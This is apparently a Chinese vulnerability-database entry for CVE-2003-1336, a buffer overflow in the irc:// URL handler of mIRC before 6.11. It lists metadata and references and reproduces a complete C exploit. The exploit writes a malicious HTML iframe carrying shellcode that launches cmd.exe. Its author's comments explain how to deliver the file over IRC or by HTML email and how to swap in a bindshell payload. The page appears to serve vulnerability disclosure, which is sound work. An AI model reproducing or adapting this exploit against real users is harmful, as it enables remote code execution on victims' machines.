mIRC IRC URL缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107527 漏洞类型 缓冲区溢出
发布时间 2003-10-21 更新时间 2007-09-24
CVE编号 CVE-2003-1336 CNNVD-ID CNNVD-200312-326
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-326
|漏洞详情
mIRC是一款流行的在线聊天程序。mIRC在处理'irc://'类型URL时缺少充分缓冲区边界检查,远程攻击者可以利用这个漏洞对目标用户进行缓冲区溢出攻击,可能以mIRC进程权限在系统上执行任意指令。当mIRC安装后,会对'irc://'类型URL注册一个处理器,但是对超长的'irc://'URL缺少充分的边界缓冲区检查,攻击者如果构建恶意的URL,诱使mIRC访问,可触发溢出,精心构建URL数据可能以mIRC进程权限在系统上执行任意指令。
|漏洞EXP
/** remote mirc < 6.11 exploit by blasty
 **
 ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
 **
 ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
 ** nobody had written an exploit yet. So I decided to start writing one.
 ** Since this was my first time coding a exploit for windows, it took some
 ** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)
 **
 ** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
 ** overflow, and when more then 998 bytes are given EIP will be overwritten.
 ** 
 ** At first I was thinking of a simple solution to get this exploitable. Since
 ** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
 ** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
 **
 ** This exploit will write an malicious HTML file containing an iframe executing the
 ** irc:// address. So you can give this to anyone on IRC for example ;)
 ** The shellcode included does only execute cmd.exe, because I don't want to be this
 ** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
 ** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
 ** some tweaking.
 ** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)
 **
 ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
 ** mIRC will start automatically when an irc:// is executed, so you can also send somebody
 ** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
 **
 **/

#include <stdio.h>


/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
unsigned char shellcode[] =
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
	"\x44\x80\xbf\x77"			//	0x78bf8044 <- adress of system()
	"\xff\xd0";				//  	call    system()
	

char jmpback[] =
        "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)

char buffer[1100], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
	FILE *evil;

	fprintf(stdout, "---------------------------------------------\n"
			"mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
                                                "Exploit downloaded on www.k-otik.com\n"
			"---------------------------------------------\n\n");

	// NOPslides are cool
	memset(buffer, 0x90, sizeof(buffer) - 1);

	// place shellcode in buffer
	memcpy(buffer + 20, shellcode, strlen(shellcode));

	// took this one from ntdll.dll (jmp esp)
	*(long *)&buffer[994] = 0x77F4801C;

	// place jmpback shellcode in buffer
	memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));

	printf("[+] Evil buffer constructed\n");


	// open HTML file for writing
	if((evil = fopen("index.html", "a+")) != NULL) {

		// construct evil string :)
		sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

		// write string to file
		fputs(fstring, evil);

		// close file
		fclose(evil);

		printf("[+] Evil HTML file written!\n");
		return(0);
	} else {
		// uh oh.. :/
		fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
		exit(1);
	}
}


// milw0rm.com [2003-10-21]
|参考资料

来源:BID
名称:8819
链接:http://www.securityfocus.com/bid/8819
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
来源:SECUNIA
名称:9996
链接:http://secunia.com/advisories/9996
来源:NTBUGTRAQ
名称:20031015mIRCBufferOverflowinircprotocolhandler
链接:http://archives.neohapsis.com/archives/ntbugtraq/2003-q4/0060.html
来源:XF
名称:mirc-ircprotocol-execute-code(13405)
链接:http://xforce.iss.net/xforce/xfdb/13405
来源:OSVDB
名称:2665
链接:http://www.osvdb.org/2665
来源:NSFOCUS
名称:5550
链接:http://www.nsfocus.net/vulndb/5550